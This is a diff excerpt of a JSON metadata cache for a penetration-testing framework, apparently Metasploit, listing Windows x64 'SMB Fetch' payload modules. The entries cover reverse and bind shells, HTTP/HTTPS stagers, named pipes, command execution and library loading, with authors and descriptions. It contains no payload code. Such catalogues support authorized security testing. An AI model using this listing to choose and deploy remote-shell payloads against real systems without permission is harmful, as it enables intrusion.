"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps",
|
||||
@@ -220337,6 +220698,3306 @@
|
||||
"payload_type": 1,
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_http": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_https": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/encrypted_shell/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/encrypted_shell",
|
||||
"stager_refname": "windows/x64/encrypted_reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Encrypted Reverse Shell",
|
||||
"fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/encrypted_shell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/exec": {
|
||||
"name": "SMB Fetch, Windows x64 Execute Command",
|
||||
"fullname": "payload/cmd/windows/smb/x64/exec",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/exec",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/exec",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/loadlibrary": {
|
||||
"name": "SMB Fetch, Windows x64 LoadLibrary Path",
|
||||
"fullname": "payload/cmd/windows/smb/x64/loadlibrary",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/loadlibrary",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/loadlibrary",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/messagebox": {
|
||||
"name": "SMB Fetch, Windows MessageBox x64",
|
||||
"fullname": "payload/cmd/windows/smb/x64/messagebox",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/messagebox",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
